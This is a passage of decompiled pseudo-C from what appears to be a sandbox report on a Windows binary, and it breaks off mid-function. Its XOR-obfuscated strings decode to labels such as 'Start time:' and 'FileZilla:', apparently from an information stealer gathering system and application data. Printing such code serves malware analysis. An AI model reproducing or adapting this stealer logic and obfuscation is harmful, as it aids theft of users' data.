								if( *((char*)(_t842 + 0x36)) == 0) {
									L27:
									_t1352 = _t1959 - 0x6f;
									_t843 = L0082FE0D(_t1352,  *(_t1959 - 0x64));
									_push(_t1352);
									L0082FE25(_t1959 - 0x154, _t843, _t1959 - 0x6f);
									 *((char*)(_t1959 - 4)) = 0x14;
									 *((intOrPtr*)(_t1959 - 0x6c)) = E0082D2AE(E0082648A());
									_t847 = E00872AC3(_t1991,  *((intOrPtr*)(_t1959 - 0x68)));
									_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
									 *((intOrPtr*)(_t1959 - 0xc4)) = _t847;
									_t848 =  *0x8b5064; // 0x80000071
									 *((intOrPtr*)(_t1959 - 0x20)) = 0x5c4f5a7d;
									 *((intOrPtr*)(_t1959 - 0x1c)) = 0x475a0e5a;
									 *((intOrPtr*)(_t1959 - 0x18)) = 0xe144b43;
									 *((char*)(_t1959 - 0x14)) = 0x2e;
									if(_t848 <=  *((intOrPtr*)(_t1890 + 4))) {
										_t1311 = _t1310 | 0xffffffff;
										__eflags = _t1311;
									} else {
										E0086DB91(_t848, 0x8b5064);
										_t1311 = _t1310 | 0xffffffff;
										_pop(_t1771);
										_t1993 =  *0x8b5064 - _t1311; // 0x80000071
										if(_t1993 == 0) {
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsb");
											L0086DFE8(_t1771, _t1993, 0x895e0e);
											 *_t1962 = 0x8b5064;
											L0086DB47();
											_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
										}
									}
									if( *0x8b5280 == 0) {
										L34:
										 *((intOrPtr*)(_t1959 - 0xc0)) = E0082D2AE(E0082640E());
										_t851 = E00826382();
										 *((intOrPtr*)(_t1959 - 0xbc)) = _t851;
										if( *((char*)(_t851 + 0x36)) == 0) {
											L37:
											_t1924 = "+";
											 *((intOrPtr*)(_t1959 - 0x58)) = 0x4f4b5a7d;
											_t1358 = "-";
											 *((intOrPtr*)(_t1959 - 0x54)) = 0x2e0e1443;
											_t853 =  ==  ? _t1358 : _t1924;
											 *((intOrPtr*)(_t1959 - 0xb8)) =  ==  ? _t1358 : _t1924;
											_t854 =  *0x8b5398; // 0x80000074
											if(_t854 >  *((intOrPtr*)(_t1890 + 4))) {
												E0086DB91(_t854, 0x8b5398);
												_t2002 =  *0x8b5398 - _t1311; // 0x80000074
												if(_t2002 == 0) {
													 *0x8b4be0 =  *((intOrPtr*)(_t1959 - 0x58));
													 *0x8b4be4 =  *((intOrPtr*)(_t1959 - 0x54));
													L0086DFE8( *((intOrPtr*)(_t1959 - 0x54)), _t2002, 0x895e3e);
													 *_t1962 = 0x8b5398;
													L0086DB47();
												}
												_t1358 = "-";
											}
											if( *0x8b4be7 == 0) {
												L44:
												 *((intOrPtr*)(_t1959 - 0x1c)) = 0x494a477e;
												_t856 =  ==  ? _t1358 : _t1924;
												 *((intOrPtr*)(_t1959 - 0x18)) = 0xe144047;
												 *((intOrPtr*)(_t1959 - 0x54)) =  ==  ? _t1358 : _t1924;
												_t857 =  *0x8b5194; // 0x80000075
												 *((char*)(_t1959 - 0x14)) = 0x2e;
												if(_t857 >  *((intOrPtr*)(_t1890 + 4))) {
													E0086DB91(_t857, 0x8b5194);
													_pop(_t1765);
													_t2008 =  *0x8b5194 - _t1311; // 0x80000075
													if(_t2008 == 0) {
														asm("movsd");
														asm("movsd");
														asm("movsb");
														L0086DFE8(_t1765, _t2008, 0x895e4d);
														 *_t1962 = 0x8b5194;
														L0086DB47();
														_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
														_t1924 = "+";
													}
												}
												if( *0x8b511c == 0) {
													L50:
													 *((intOrPtr*)(_t1959 - 0x1c)) = 0x42424f79;
													_t859 =  ==  ? "-" : _t1924;
													 *((intOrPtr*)(_t1959 - 0x18)) = 0xe145a4b;
													 *((intOrPtr*)(_t1959 - 0xc8)) =  ==  ? "-" : _t1924;
													_t860 =  *0x8b562c; // 0x80000076
													 *((char*)(_t1959 - 0x14)) = 0x2e;
													if(_t860 >  *((intOrPtr*)(_t1890 + 4))) {
														E0086DB91(_t860, 0x8b562c);
														_pop(_t1763);
														_t2014 =  *0x8b562c - _t1311; // 0x80000076
														if(_t2014 == 0) {
															asm("movsd");
															asm("movsd");
															asm("movsb");
															L0086DFE8(_t1763, _t2014, 0x895e5a);
															 *_t1962 = 0x8b562c;
															L0086DB47();
															_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
															_t1924 = "+";
														}
													}
													if( *0x8b4cc0 == 0) {
														L56:
														_t1360 = "-";
														 *((intOrPtr*)(_t1959 - 0x38)) = 0x14677d7e;
														_t862 =  ==  ? _t1360 : _t1924;
														 *((short*)(_t1959 - 0x34)) = 0x2e0e;
														 *((intOrPtr*)(_t1959 - 0xac)) =  ==  ? _t1360 : _t1924;
														_t863 =  *0x8b5dbc; // 0x80000077
														if(_t863 >  *((intOrPtr*)(_t1890 + 4))) {
															E0086DB91(_t863, 0x8b5dbc);
															_pop(_t1761);
															_t2020 =  *0x8b5dbc - _t1311; // 0x80000077
															if(_t2020 == 0) {
																 *0x8b5ce8 =  *((intOrPtr*)(_t1959 - 0x38));
																 *0x8b5cec =  *((intOrPtr*)(_t1959 - 0x34));
																L0086DFE8(_t1761, _t2020, 0x895e67);
																 *_t1962 = 0x8b5dbc;
																L0086DB47();
															}
															_t1360 = "-";
														}
														if( *0x8b5ced == 0) {
															L63:
															 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4d5d476a;
															_t865 =  ==  ? _t1360 : _t1924;
															 *((intOrPtr*)(_t1959 - 0x18)) = 0x144a5c41;
															 *((intOrPtr*)(_t1959 - 0x38)) =  ==  ? _t1360 : _t1924;
															_t866 =  *0x8b5384; // 0x80000078
															 *((short*)(_t1959 - 0x14)) = 0x2e0e;
															if(_t866 >  *((intOrPtr*)(_t1890 + 4))) {
																E0086DB91(_t866, 0x8b5384);
																_pop(_t1759);
																_t2026 =  *0x8b5384 - _t1311; // 0x80000078
																if(_t2026 == 0) {
																	asm("movsd");
																	asm("movsd");
																	asm("movsw");
																	L0086DFE8(_t1759, _t2026, 0x895e75);
																	 *_t1962 = 0x8b5384;
																	L0086DB47();
																	_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																	_t1924 = "+";
																}
															}
															if( *0x8b56a9 == 0) {
																L69:
																 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4b424b7a;
																_t868 =  ==  ? "-" : _t1924;
																 *((intOrPtr*)(_t1959 - 0x18)) = 0x434f5c49;
																 *((intOrPtr*)(_t1959 - 0xa8)) =  ==  ? "-" : _t1924;
																_t869 =  *0x8b5320; // 0x80000079
																 *((short*)(_t1959 - 0x14)) = 0xe14;
																 *((char*)(_t1959 - 0x12)) = 0x2e;
																if(_t869 >  *((intOrPtr*)(_t1890 + 4))) {
																	E0086DB91(_t869, 0x8b5320);
																	_pop(_t1757);
																	_t2032 =  *0x8b5320 - _t1311; // 0x80000079
																	if(_t2032 == 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsw");
																		asm("movsb");
																		L0086DFE8(_t1757, _t2032, 0x895e83);
																		 *_t1962 = 0x8b5320;
																		L0086DB47();
																		_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																		_t1924 = "+";
																	}
																}
																if( *0x8b5e8e == 0) {
																	L75:
																	 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4a5c4160;
																	_t871 =  ==  ? "-" : _t1924;
																	 *((intOrPtr*)(_t1959 - 0x18)) = 0x14607e78;
																	 *((intOrPtr*)(_t1959 - 0xa4)) =  ==  ? "-" : _t1924;
																	_t872 =  *0x8b51d8; // 0x8000007a
																	 *((short*)(_t1959 - 0x14)) = 0x2e0e;
																	if(_t872 >  *((intOrPtr*)(_t1890 + 4))) {
																		E0086DB91(_t872, 0x8b51d8);
																		_pop(_t1755);
																		_t2038 =  *0x8b51d8 - _t1311; // 0x8000007a
																		if(_t2038 == 0) {
																			asm("movsd");
																			asm("movsd");
																			asm("movsw");
																			L0086DFE8(_t1755, _t2038, 0x895e92);
																			 *_t1962 = 0x8b51d8;
																			L0086DB47();
																			_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																			_t1924 = "+";
																		}
																	}
																	if( *0x8b5e11 == 0) {
																		L81:
																		 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4b424768;
																		_t874 =  ==  ? "-" : _t1924;
																		 *((intOrPtr*)(_t1959 - 0x18)) = 0x42424774;
																		 *((intOrPtr*)(_t1959 - 0xa0)) =  ==  ? "-" : _t1924;
																		_t875 =  *0x8b5c30; // 0x8000007b
																		 *((intOrPtr*)(_t1959 - 0x14)) = 0x2e0e144f;
																		if(_t875 >  *((intOrPtr*)(_t1890 + 4))) {
																			E0086DB91(_t875, 0x8b5c30);
																			_pop(_t1753);
																			_t2044 =  *0x8b5c30 - _t1311; // 0x8000007b
																			if(_t2044 == 0) {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				L0086DFE8(_t1753, _t2044, 0x895ea0);
																				 *_t1962 = 0x8b5c30;
																				L0086DB47();
																				_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																				_t1924 = "+";
																			}
																		}
																		if( *0x8b4df3 == 0) {
																			L87:
																			_t1790 =  *0x8b4820; // 0xc
																			 *((intOrPtr*)(_t1959 - 0xb0)) = L00811D2D(_t1959 - 0xbbc, _t1790);
																			 *((char*)(_t1959 - 4)) = 0x15;
																			_t877 =  *0x8b5c50; // 0x8000007c
																			 *((intOrPtr*)(_t1959 - 0x50)) = 0x4b424768;
																			 *((intOrPtr*)(_t1959 - 0x4c)) = 0x2e0e145d;
																			if(_t877 >  *((intOrPtr*)(_t1890 + 4))) {
																				E0086DB91(_t877, 0x8b5c50);
																				_t2049 =  *0x8b5c50 - _t1311; // 0x8000007c
																				if(_t2049 == 0) {
																					 *0x8b61c8 =  *((intOrPtr*)(_t1959 - 0x50));
																					 *0x8b61cc =  *((intOrPtr*)(_t1959 - 0x4c));
																					L0086DFE8( *((intOrPtr*)(_t1959 - 0x4c)), _t2049, 0x895ead);
																					 *_t1962 = 0x8b5c50;
																					L0086DB47();
																				}
																			}
																			if( *0x8b61cf == 0) {
																				L93:
																				 *((intOrPtr*)(_t1959 - 0x20)) = 0x465a5b6f;
																				_t879 =  ==  ? "-" : _t1924;
																				 *((intOrPtr*)(_t1959 - 0x1c)) = 0x1c060e57;
																				 *((intOrPtr*)(_t1959 - 0x4c)) =  ==  ? "-" : _t1924;
																				_t880 =  *0x8b5c3c; // 0x8000007d
																				 *((intOrPtr*)(_t1959 - 0x18)) = 0x14076f68;
																				 *((short*)(_t1959 - 0x14)) = 0x2e0e;
																				if(_t880 >  *((intOrPtr*)(_t1890 + 4))) {
																					E0086DB91(_t880, 0x8b5c3c);
																					_pop(_t1748);
																					_t2055 =  *0x8b5c3c - _t1311; // 0x8000007d
																					if(_t2055 == 0) {
																						asm("movsd");
																						asm("movsd");
																						asm("movsd");
																						asm("movsw");
																						L0086DFE8(_t1748, _t2055, 0x895ebc);
																						 *_t1962 = 0x8b5c3c;
																						L0086DB47();
																						_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																						_t1924 = "+";
																					}
																				}
																				if( *0x8b5ba1 == 0) {
																					L99:
																					 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4b465a6b;
																					_t882 =  ==  ? "-" : _t1924;
																					 *((intOrPtr*)(_t1959 - 0x18)) = 0x435b4b5c;
																					 *((intOrPtr*)(_t1959 - 0x9c)) =  ==  ? "-" : _t1924;
																					_t883 =  *0x8b585c; // 0x8000007e
																					 *((short*)(_t1959 - 0x14)) = 0xe14;
																					 *((char*)(_t1959 - 0x12)) = 0x2e;
																					if(_t883 >  *((intOrPtr*)(_t1890 + 4))) {
																						E0086DB91(_t883, 0x8b585c);
																						_pop(_t1746);
																						_t2061 =  *0x8b585c - _t1311; // 0x8000007e
																						if(_t2061 == 0) {
																							asm("movsd");
																							asm("movsd");
																							asm("movsw");
																							asm("movsb");
																							L0086DFE8(_t1746, _t2061, 0x895ecb);
																							 *_t1962 = 0x8b585c;
																							L0086DB47();
																							_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																							_t1924 = "+";
																						}
																					}
																					if( *0x8b5f3e == 0) {
																						L105:
																						_t1367 = "-";
																						 *((intOrPtr*)(_t1959 - 0x40)) = 0x5d4f4d74;
																						_t885 =  ==  ? _t1367 : _t1924;
																						 *((intOrPtr*)(_t1959 - 0x3c)) = 0x2e0e1446;
																						 *((intOrPtr*)(_t1959 - 0x98)) =  ==  ? _t1367 : _t1924;
																						_t886 =  *0x8b5e78; // 0x8000007f
																						if(_t886 >  *((intOrPtr*)(_t1890 + 4))) {
																							E0086DB91(_t886, 0x8b5e78);
																							_t2067 =  *0x8b5e78 - _t1311; // 0x8000007f
																							if(_t2067 == 0) {
																								 *0x8b5d00 =  *((intOrPtr*)(_t1959 - 0x40));
																								 *0x8b5d04 =  *((intOrPtr*)(_t1959 - 0x3c));
																								L0086DFE8( *((intOrPtr*)(_t1959 - 0x3c)), _t2067, 0x895eda);
																								 *_t1962 = 0x8b5e78;
																								L0086DB47();
																							}
																							_t1367 = "-";
																						}
																						if( *0x8b5d07 == 0) {
																							L112:
																							 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4d4b426b;
																							_t888 =  ==  ? _t1367 : _t1924;
																							 *((intOrPtr*)(_t1959 - 0x18)) = 0x435b5c5a;
																							 *((intOrPtr*)(_t1959 - 0x3c)) =  ==  ? _t1367 : _t1924;
																							_t889 =  *0x8b5fa4; // 0x80000080
																							 *((short*)(_t1959 - 0x14)) = 0xe14;
																							 *((char*)(_t1959 - 0x12)) = 0x2e;
																							if(_t889 >  *((intOrPtr*)(_t1890 + 4))) {
																								E0086DB91(_t889, 0x8b5fa4);
																								_pop(_t1741);
																								_t2073 =  *0x8b5fa4 - _t1311; // 0x80000080
																								if(_t2073 == 0) {
																									asm("movsd");
																									asm("movsd");
																									asm("movsw");
																									asm("movsb");
																									L0086DFE8(_t1741, _t2073, 0x895ee9);
																									 *_t1962 = 0x8b5fa4;
																									L0086DB47();
																									_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																									_t1924 = "+";
																								}
																							}
																							if( *0x8b5e42 == 0) {
																								L118:
																								 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4b5a4762;
																								_t891 =  ==  ? "-" : _t1924;
																								 *((intOrPtr*)(_t1959 - 0x18)) = 0x4047414d;
																								 *((intOrPtr*)(_t1959 - 0x94)) =  ==  ? "-" : _t1924;
																								_t892 =  *0x8b5ee0; // 0x80000081
																								 *((short*)(_t1959 - 0x14)) = 0xe14;
																								 *((char*)(_t1959 - 0x12)) = 0x2e;
																								if(_t892 >  *((intOrPtr*)(_t1890 + 4))) {
																									E0086DB91(_t892, 0x8b5ee0);
																									_pop(_t1739);
																									_t2079 =  *0x8b5ee0 - _t1311; // 0x80000081
																									if(_t2079 == 0) {
																										asm("movsd");
																										asm("movsd");
																										asm("movsw");
																										asm("movsb");
																										L0086DFE8(_t1739, _t2079, 0x895ef8);
																										 *_t1962 = 0x8b5ee0;
																										L0086DB47();
																										_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																										_t1924 = "+";
																									}
																								}
																								if( *0x8b5246 == 0) {
																									L124:
																									 *((intOrPtr*)(_t1959 - 0x1c)) = 0x465d4f6a;
																									_t894 =  ==  ? "-" : _t1924;
																									 *((intOrPtr*)(_t1959 - 0x18)) = 0x4b5c416d;
																									 *((intOrPtr*)(_t1959 - 0x90)) =  ==  ? "-" : _t1924;
																									_t895 =  *0x8b57a4; // 0x80000082
																									 *((short*)(_t1959 - 0x14)) = 0xe14;
																									 *((char*)(_t1959 - 0x12)) = 0x2e;
																									if(_t895 >  *((intOrPtr*)(_t1890 + 4))) {
																										E0086DB91(_t895, 0x8b57a4);
																										_pop(_t1737);
																										_t2085 =  *0x8b57a4 - _t1311; // 0x80000082
																										if(_t2085 == 0) {
																											asm("movsd");
																											asm("movsd");
																											asm("movsw");
																											asm("movsb");
																											L0086DFE8(_t1737, _t2085, 0x895f07);
																											 *_t1962 = 0x8b57a4;
																											L0086DB47();
																											_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																											_t1924 = "+";
																										}
																									}
																									if( *0x8b5b92 == 0) {
																										L130:
																										 *((intOrPtr*)(_t1959 - 0x20)) = 0x4d5a476c;
																										_t897 =  ==  ? "-" : _t1924;
																										 *((intOrPtr*)(_t1959 - 0x1c)) = 0x6d404741;
																										 *((intOrPtr*)(_t1959 - 0x8c)) =  ==  ? "-" : _t1924;
																										_t898 =  *0x8b59b0; // 0x80000083
																										 *((intOrPtr*)(_t1959 - 0x18)) = 0x144b5c41;
																										 *((short*)(_t1959 - 0x14)) = 0x2e0e;
																										if(_t898 >  *((intOrPtr*)(_t1890 + 4))) {
																											E0086DB91(_t898, 0x8b59b0);
																											_pop(_t1735);
																											_t2091 =  *0x8b59b0 - _t1311; // 0x80000083
																											if(_t2091 == 0) {
																												asm("movsd");
																												asm("movsd");
																												asm("movsd");
																												asm("movsw");
																												L0086DFE8(_t1735, _t2091, 0x895f16);
																												 *_t1962 = 0x8b59b0;
																												L0086DB47();
																												_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																												_t1924 = "+";
																											}
																										}
																										if( *0x8b6231 == 0) {
																											L136:
																											 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4b5a576c;
																											_t900 =  ==  ? "-" : _t1924;
																											 *((intOrPtr*)(_t1959 - 0x18)) = 0x4047414d;
																											 *((intOrPtr*)(_t1959 - 0x88)) =  ==  ? "-" : _t1924;
																											_t901 =  *0x8b519c; // 0x80000084
																											 *((short*)(_t1959 - 0x14)) = 0xe14;
																											 *((char*)(_t1959 - 0x12)) = 0x2e;
																											if(_t901 >  *((intOrPtr*)(_t1890 + 4))) {
																												E0086DB91(_t901, 0x8b519c);
																												_pop(_t1733);
																												_t2097 =  *0x8b519c - _t1311; // 0x80000084
																												if(_t2097 == 0) {
																													asm("movsd");
																													asm("movsd");
																													asm("movsw");
																													asm("movsb");
																													L0086DFE8(_t1733, _t2097, 0x895f25);
																													 *_t1962 = 0x8b519c;
																													L0086DB47();
																													_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																													_t1924 = "+";
																												}
																											}
																											if( *0x8b54a6 == 0) {
																												L142:
																												 *((intOrPtr*)(_t1959 - 0x1c)) = 0x41435c6f;
																												_t903 =  ==  ? "-" : _t1924;
																												 *((intOrPtr*)(_t1959 - 0x18)) = 0xe14575c;
																												 *((intOrPtr*)(_t1959 - 0xd4)) =  ==  ? "-" : _t1924;
																												_t904 =  *0x8b52c0; // 0x80000085
																												 *((char*)(_t1959 - 0x14)) = 0x2e;
																												if(_t904 >  *((intOrPtr*)(_t1890 + 4))) {
																													E0086DB91(_t904, 0x8b52c0);
																													_pop(_t1731);
																													_t2103 =  *0x8b52c0 - _t1311; // 0x80000085
																													if(_t2103 == 0) {
																														asm("movsd");
																														asm("movsd");
																														asm("movsb");
																														L0086DFE8(_t1731, _t2103, 0x895f34);
																														 *_t1962 = 0x8b52c0;
																														L0086DB47();
																														_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																														_t1924 = "+";
																													}
																												}
																												if( *0x8b5c2c == 0) {
																													L148:
																													 *((intOrPtr*)(_t1959 - 0x1c)) = 0x43415a6f;
																													_t1925 =  ==  ? "-" : _t1924;
																													 *((intOrPtr*)(_t1959 - 0x18)) = 0xe144d47;
																													_t906 =  *0x8b5684; // 0x80000086
																													 *((intOrPtr*)(_t1959 - 0xd0)) =  ==  ? "-" : _t1924;
																													 *((char*)(_t1959 - 0x14)) = 0x2e;
																													if(_t906 >  *((intOrPtr*)(_t1890 + 4))) {
																														E0086DB91(_t906, 0x8b5684);
																														_pop(_t1729);
																														_t2109 =  *0x8b5684 - _t1311; // 0x80000086
																														if(_t2109 == 0) {
																															asm("movsd");
																															asm("movsd");
																															asm("movsb");
																															L0086DFE8(_t1729, _t2109, 0x895f41);
																															 *_t1962 = 0x8b5684;
																															L0086DB47();
																															_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																														}
																													}
																													if( *0x8b5e54 == 0) {
																														L154:
																														_t1791 =  *0x8b4884; // 0x0
																														 *((intOrPtr*)(_t1959 - 0xcc)) = L00811D2D(_t1959 - 0xba4, _t1791);
																														 *((char*)(_t1959 - 4)) = 0x16;
																														_t908 =  *0x8b4fb4; // 0x80000087
																														 *((intOrPtr*)(_t1959 - 0x48)) = 0x4a5c4f6d;
																														 *((intOrPtr*)(_t1959 - 0x44)) = 0x2e0e145d;
																														if(_t908 >  *((intOrPtr*)(_t1890 + 4))) {
																															E0086DB91(_t908, 0x8b4fb4);
																															_t2114 =  *0x8b4fb4 - _t1311; // 0x80000087
																															if(_t2114 == 0) {
																																 *0x8b59c0 =  *((intOrPtr*)(_t1959 - 0x48));
																																 *0x8b59c4 =  *((intOrPtr*)(_t1959 - 0x44));
																																L0086DFE8( *((intOrPtr*)(_t1959 - 0x44)), _t2114, 0x895f4e);
																																L0086DB47(0x8b4fb4);
																															}
																														}
																														if( *0x8b59c7 == 0) {
																															L160:
																															_t1792 =  *0x8b482c; // 0x0
																															 *((intOrPtr*)(_t1959 - 0x44)) = L00811D2D(_t1959 - 0xb8c, _t1792);
																															 *((char*)(_t1959 - 4)) = 0x17;
																															_t910 =  *0x8b4f30; // 0x80000088
																															 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4541416d;
																															 *((intOrPtr*)(_t1959 - 0x18)) = 0x145d4b47;
																															 *((short*)(_t1959 - 0x14)) = 0x2e0e;
																															if(_t910 >  *((intOrPtr*)(_t1890 + 4))) {
																																E0086DB91(_t910, 0x8b4f30);
																																_pop(_t1723);
																																_t2119 =  *0x8b4f30 - _t1311; // 0x80000088
																																if(_t2119 == 0) {
																																	asm("movsd");
																																	asm("movsd");
																																	asm("movsw");
																																	L0086DFE8(_t1723, _t2119, 0x895f5d);
																																	 *_t1962 = 0x8b4f30;
																																	L0086DB47();
																																	_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																																}
																															}
																															if( *0x8b5f91 == 0) {
																																L166:
																																_t1793 =  *0x8b4848; // 0x0
																																 *((intOrPtr*)(_t1959 - 0xb4)) = L00811D2D(_t1959 - 0xb74, _t1793);
																																 *((char*)(_t1959 - 4)) = 0x18;
																																_t912 =  *0x8b6198;
																																 *((intOrPtr*)(_t1959 - 0x1c)) = 0x5d5d4f7e;
																																 *((intOrPtr*)(_t1959 - 0x18)) = 0x4a5c4159;
																																 *((intOrPtr*)(_t1959 - 0x14)) = 0x2e0e145d;
																																if( *0x8b6198 >  *((intOrPtr*)(_t1890 + 4))) {
																																	E0086DB91(_t912, 0x8b6198);
																																	_pop(_t1721);
																																	_t2124 =  *0x8b6198 - _t1311;
																																	if( *0x8b6198 == _t1311) {
																																		asm("movsd");
																																		asm("movsd");
																																		asm("movsd");
																																		L0086DFE8(_t1721, _t2124, 0x895f6b);
																																		 *_t1962 = 0x8b6198;
																																		L0086DB47();
																																		_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																																	}
																																}
																																if( *0x8b5257 == 0) {
																																	L172:
																																	_t1794 =  *0x8b48a4; // 0x0
																																	 *((intOrPtr*)(_t1959 - 0x5c)) = L00811D2D(_t1959 - 0xb5c, _t1794);
																																	 *((char*)(_t1959 - 4)) = 0x19;
																																	_t914 =  *0x8b5e48; // 0x8000008a
																																	 *((intOrPtr*)(_t1959 - 0x1c)) = 0x415a5b6f;
																																	 *((intOrPtr*)(_t1959 - 0x18)) = 0x42424768;
																																	 *((short*)(_t1959 - 0x14)) = 0xe14;
																																	 *((char*)(_t1959 - 0x12)) = 0x2e;
																																	if(_t914 >  *((intOrPtr*)(_t1890 + 4))) {
																																		E0086DB91(_t914, 0x8b5e48);
																																		_pop(_t1719);
																																		_t2129 =  *0x8b5e48 - _t1311; // 0x8000008a
																																		if(_t2129 == 0) {
																																			asm("movsd");
																																			asm("movsd");
																																			asm("movsw");
																																			asm("movsb");
																																			L0086DFE8(_t1719, _t2129, 0x895f78);
																																			 *_t1962 = 0x8b5e48;
																																			L0086DB47();
																																			_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																																		}
																																	}
																																	if( *0x8b4b4a == 0) {
																																		L178:
																																		 *((intOrPtr*)(_t1959 - 0x60)) = L0082BC3C(_t1311, _t1959 - 0xb44);
																																		 *((char*)(_t1959 - 4)) = 0x1a;
																																		_t916 = E00822A28(_t1311, _t1959 - 0xb2c, _t1794); // executed
																																		 *(_t1959 - 0x64) = _t916;
																																		 *((char*)(_t1959 - 4)) = 0x1b;
																																		_t917 =  *0x8b5864; // 0x8000008d
																																		 *((intOrPtr*)(_t1959 - 0x1c)) = 0x5a5d577d;
																																		 *((intOrPtr*)(_t1959 - 0x18)) = 0xe14434b;
																																		 *((char*)(_t1959 - 0x14)) = 0x2e;
																																		if(_t917 >  *((intOrPtr*)(_t1890 + 4))) {
																																			E0086DB91(_t917, 0x8b5864);
																																			_pop(_t1717);
																																			_t2134 =  *0x8b5864 - _t1311; // 0x8000008d
																																			if(_t2134 == 0) {
																																				asm("movsd");
																																				asm("movsd");
																																				asm("movsb");
																																				L0086DFE8(_t1717, _t2134, 0x895f87);
																																				 *_t1962 = 0x8b5864;
																																				L0086DB47();
																																				_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																																			}
																																		}
																																		if( *0x8b4ef4 == 0) {
																																			L184:
																																			_t918 = E008262F6();
																																			 *((intOrPtr*)(_t1959 - 0x68)) = _t918;
																																			if( *((char*)(_t918 + 0x36)) == 0) {
																																				L187:
																																				asm("movaps xmm0, [0x8a91d0]");
																																				_t919 =  *0x8b51c8; // 0x8000008f
																																				asm("movups [ebp-0x28], xmm0");
																																				 *((intOrPtr*)(_t1959 - 0x18)) = 0x247a6d6b;
																																				 *((char*)(_t1959 - 0x14)) = 0x2e;
																																				if(_t919 >  *((intOrPtr*)(_t1890 + 4))) {
																																					E0086DB91(_t919, 0x8b51c8);
																																					_t2142 =  *0x8b51c8 - _t1311; // 0x8000008f
																																					if(_t2142 == 0) {
																																						E0082D54D(0x8b52f0, _t1959 - 0x28);
																																						L0086DFE8(0x8b52f0, _t2142, 0x895fa6);
																																						L0086DB47(0x8b51c8);
																																					}
																																				}
																																				if( *0x8b5304 == 0) {
																																					L193:
																																					_t920 =  *0x8b4e48; // 0x80000090
																																					 *((intOrPtr*)(_t1959 - 0x20)) = 0x7a6b6c75;
																																					 *((intOrPtr*)(_t1959 - 0x1c)) = 0x7b6c0e6f;
																																					 *((intOrPtr*)(_t1959 - 0x18)) = 0xe6a6267;
																																					 *((short*)(_t1959 - 0x14)) = 0x2e58;
																																					if(_t920 >  *((intOrPtr*)(_t1890 + 4))) {
																																						E0086DB91(_t920, 0x8b4e48);
																																						_pop(_t1710);
																																						_t2147 =  *0x8b4e48 - _t1311; // 0x80000090
																																						if(_t2147 == 0) {
																																							asm("movsd");
																																							asm("movsd");
																																							asm("movsd");
																																							asm("movsw");
																																							L0086DFE8(_t1710, _t2147, 0x895fb6);
																																							 *_t1962 = 0x8b4e48;
																																							L0086DB47();
																																							_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																																						}
																																					}
																																					if( *0x8b500d == 0) {
																																						L199:
																																						_t1312 = E0082626A();
																																						if( *((char*)(_t1312 + 0x35)) == 0) {
																																							L202:
																																							_t922 =  *0x8b5110; // 0x80000092
																																							 *((intOrPtr*)(_t1959 - 0x20)) = 0x42475b6c;
																																							 *((intOrPtr*)(_t1959 - 0x1c)) = 0x4f400e4a;
																																							 *((intOrPtr*)(_t1959 - 0x18)) = 0xe144b43;
																																							 *((char*)(_t1959 - 0x14)) = 0x2e;
																																							if(_t922 >  *((intOrPtr*)(_t1890 + 4))) {
																																								E0086DB91(_t922, 0x8b5110);
																																								_t2155 =  *0x8b5110 - 0xffffffff;
																																								_pop(_t1707);
																																								if( *0x8b5110 == 0xffffffff) {
																																									asm("movsd");
																																									asm("movsd");
																																									asm("movsd");
																																									asm("movsb");
																																									L0086DFE8(_t1707, _t2155, 0x895fd7);
																																									 *_t1962 = 0x8b5110;
																																									L0086DB47();
																																									_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																																								}
																																							}
																																							if( *0x8b5edc == 0) {
																																								L208:
																																								_t923 =  *0x8b4bb4; // 0x80000093
																																								 *((intOrPtr*)(_t1959 - 0x1c)) = 0x5d5c4b78;
																																								 *((intOrPtr*)(_t1959 - 0x18)) = 0x14404147;
																																								 *((short*)(_t1959 - 0x14)) = 0x2e0e;
																																								if(_t923 >  *((intOrPtr*)(_t1890 + 4))) {
																																									E0086DB91(_t923, 0x8b4bb4);
																																									_t2160 =  *0x8b4bb4 - 0xffffffff;
																																									_pop(_t1705);
																																									if( *0x8b4bb4 == 0xffffffff) {
																																										asm("movsd");
																																										asm("movsd");
																																										asm("movsw");
																																										L0086DFE8(_t1705, _t2160, 0x895fe5);
																																										 *_t1962 = 0x8b4bb4;
																																										L0086DB47();
																																										_t1890 =  *((intOrPtr*)(_t1959 - 0x2c));
																																									}
																																								}
																																								if( *0x8b5ab9 == 0) {
																																									L214:
																																									_t924 = L0082FE54(_t1959 - 0x6f, _t1794, 0x3d600344, 0);
																																									_t1963 = _t1962 + 4;
																																									L0082FE25(_t1959 - 0x13c, _t924, _t1959 - 0x6f);
																																									 *((char*)(_t1959 - 4)) = 0x1c;
																																									_t926 =  *0x8b52d0; // 0x80000094
																																									 *((intOrPtr*)(_t1959 - 0x18)) = 0x42475b6c;
																																									 *((intOrPtr*)(_t1959 - 0x14)) = 0x2e0e144a;
